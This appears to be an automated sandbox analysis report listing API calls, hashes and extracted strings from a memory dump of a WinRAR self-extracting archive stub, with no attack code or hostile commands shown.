                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID:
                  • API String ID: 3004599000-0
                  • Opcode ID: 12f8c06f908a318838684f452d43de0fe88c8338eaa5c3e127255bb2369ebb4f
                  • Instruction ID: 60098e5ebe706de4e65aa76ed6b46f7be0ac1a1c87a8db6b50b8c51b2db801e3
                  • Opcode Fuzzy Hash: 12f8c06f908a318838684f452d43de0fe88c8338eaa5c3e127255bb2369ebb4f
                  • Instruction Fuzzy Hash: 0A821971D04345AEDF25DB70C881BFABBA9AF05360F0840B9FC599B142DB785A49EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F4AEE5
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prologItemTextWindow
                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                  • API String ID: 810644672-3472986185
                  • Opcode ID: 4beb8472cd16166f8a1609b1940b0147f5b3ca0cda6964a61fe2f218252265ba
                  • Instruction ID: 9bdd80a5b447a5987d90781ca473384e193ddb176fdb930ff82c1d45a6498dc0
                  • Opcode Fuzzy Hash: 4beb8472cd16166f8a1609b1940b0147f5b3ca0cda6964a61fe2f218252265ba
                  • Instruction Fuzzy Hash: 9C42C771D44258BEEB21DF609C4AFBE7F7CAB01755F000055FA05A61E2CBB88985FB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32), ref: 00F400E4
                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F400F6
                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F40127
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F403D4
                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F403F0
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F40402
                  • ReadFile.KERNEL32(00000000,?,00007FFE,00F63BA4,00000000), ref: 00F40421
                  • CloseHandle.KERNEL32(00000000), ref: 00F40479
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F4048F
                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00F404E7
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00F40510
                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00F4054A
                    • Part of subcall function 00F40085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                    • Part of subcall function 00F40085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  • _swprintf.LIBCMT ref: 00F405BE
                  • _swprintf.LIBCMT ref: 00F4060A
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • AllocConsole.KERNEL32 ref: 00F40612
                  • GetCurrentProcessId.KERNEL32 ref: 00F4061C
                  • AttachConsole.KERNEL32(00000000), ref: 00F40623
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F40649
                  • WriteConsoleW.KERNEL32(00000000), ref: 00F40650
                  • Sleep.KERNEL32(00002710), ref: 00F4065B
                  • FreeConsole.KERNEL32 ref: 00F40661
                  • ExitProcess.KERNEL32 ref: 00F40669
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F4BDFA
                    • Part of subcall function 00F4AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F4AAFE
                  • SetWindowTextW.USER32(?,?), ref: 00F4C127
                  • _wcsrchr.LIBVCRUNTIME ref: 00F4C2B1
                  • GetDlgItem.USER32(?,00000066), ref: 00F4C2EC
                  • SetWindowTextW.USER32(00000000,?), ref: 00F4C2FC
                  • SendMessageW.USER32(00000000,00000143,00000000,00F7A472), ref: 00F4C30A
                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F4C335
                  Similarity
                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F3D346
                  • _wcschr.LIBVCRUNTIME ref: 00F3D367
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00F3D328,?), ref: 00F3D382
                  • __fprintf_l.LIBCMT ref: 00F3D873
                    • Part of subcall function 00F4137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F3B652,00000000,?,?,?,00010428), ref: 00F41396
                  Similarity
                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F4AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4AC85
                    • Part of subcall function 00F4AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4AC96
                    • Part of subcall function 00F4AC74: IsDialogMessageW.USER32(00010428,?), ref: 00F4ACAA
                    • Part of subcall function 00F4AC74: TranslateMessage.USER32(?), ref: 00F4ACB8
                    • Part of subcall function 00F4AC74: DispatchMessageW.USER32(?), ref: 00F4ACC2
                  • GetDlgItem.USER32(00000068,00F8ECB0), ref: 00F4CB6E
                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00F4A632,00000001,?,?,00F4AECB,00F64F88,00F8ECB0), ref: 00F4CB96
                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F4CBA1
                  • SendMessageW.USER32(00000000,000000C2,00000000,00F635B4), ref: 00F4CBAF
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F4CBC5
                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F4CBDF
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F4CC23
                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F4CC31
                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F4CC40
                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F4CC67
                  • SendMessageW.USER32(00000000,000000C2,00000000,00F6431C), ref: 00F4CC76
                  Similarity
                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                  • String ID: \
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ShellExecuteExW.SHELL32(?), ref: 00F4CF54
                  • ShowWindow.USER32(?,00000000), ref: 00F4CF93
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00F4CFCF
                  • CloseHandle.KERNEL32(?), ref: 00F4CFF5
                  • ShowWindow.USER32(?,00000001), ref: 00F4D084
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  Similarity
                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                  • String ID: $.exe$.inf
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F54E35,00F54E35,?,?,?,00F5A2A9,00000001,00000001,3FE85006), ref: 00F5A0B2
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F5A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00F5A138
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F5A232
                  • __freea.LIBCMT ref: 00F5A23F
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  • __freea.LIBCMT ref: 00F5A248
                  • __freea.LIBCMT ref: 00F5A26D
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetClassNameW.USER32(?,?,00000050), ref: 00F4A2DE
                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F4A315
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F4A305
                  Similarity
                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                  • String ID: @Ut$EDIT
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F40085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                    • Part of subcall function 00F40085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  • OleInitialize.OLE32(00000000), ref: 00F4A34E
                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F4A385
                  • SHGetMalloc.SHELL32(00F78430), ref: 00F4A38F
                  Similarity
                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                  • String ID: riched20.dll$3So
                  • API String ID: 3498096277-3464455743
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Control-flow graph not reproduced; first block f399b0-f399d1. Legend: Executed / Not Executed]
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00F378AD,?,00000005,?,00000011), ref: 00F39A4C
                  • GetLastError.KERNEL32(?,?,00F378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F39A59
                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00F378AD,?,00000005,?), ref: 00F39A8E
                  • GetLastError.KERNEL32(?,?,00F378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F39A96
                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F39ADB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$CreateErrorLast$Time
                  • String ID:
                  • API String ID: 1999340476-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Control-flow graph not reproduced; first block f4ac74-f4ac8d. Legend: Executed / Not Executed]
                  APIs
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4AC85
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4AC96
                  • IsDialogMessageW.USER32(00010428,?), ref: 00F4ACAA
                  • TranslateMessage.USER32(?), ref: 00F4ACB8
                  • DispatchMessageW.USER32(?), ref: 00F4ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchPeekTranslate
                  • String ID:
                  • API String ID: 1266772231-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Control-flow graph not reproduced; first block f4d287-f4d2b2. Legend: Executed / Not Executed]
                  APIs
                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F4D29D
                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F4D2D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: EnvironmentVariable
                  • String ID: sfxcmd$sfxpar
                  • API String ID: 1431749950-3493335439
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  [Control-flow graph not reproduced; first block f3984e-f3985a. Legend: Executed / Not Executed]
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 00F3985E
                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00F39876
                  • GetLastError.KERNEL32 ref: 00F398A8
                  • GetLastError.KERNEL32 ref: 00F398C7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLast$FileHandleRead
                  • String ID:
                  • API String ID: 2244327787-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00F3CFE0,00000000,00000000,?,00F5A49B,00F3CFE0,00000000,00000000,00000000,?,00F5A698,00000006,FlsSetValue), ref: 00F5A526
                  • GetLastError.KERNEL32(?,00F5A49B,00F3CFE0,00000000,00000000,00000000,?,00F5A698,00000006,FlsSetValue,00F67348,00F67350,00000000,00000364,?,00F59077), ref: 00F5A532
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F5A49B,00F3CFE0,00000000,00000000,00000000,?,00F5A698,00000006,FlsSetValue,00F67348,00F67350,00000000), ref: 00F5A540
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00F3CC94,00000001,?,?,?,00000000,00F44ECD,?,?,?), ref: 00F39F4C
                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00F44ECD,?,?,?,?,?,00F44972,?), ref: 00F39F8E
                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00F3CC94,00000001,?,?), ref: 00F39FB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileWrite$Handle
                  • String ID:
                  • API String ID: 4209713984-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A22E
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A261
                  • GetLastError.KERNEL32(?,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A27E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CreateDirectory$ErrorLast
                  • String ID:
                  • API String ID: 2485089472-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00F5B019
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00F5A79D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx
                  • API String ID: 2568140703-3893581201
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00F59D2F), ref: 00F5A715
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 00F5A6E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 2593887523-3084827643
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 00F532AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4E20B
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
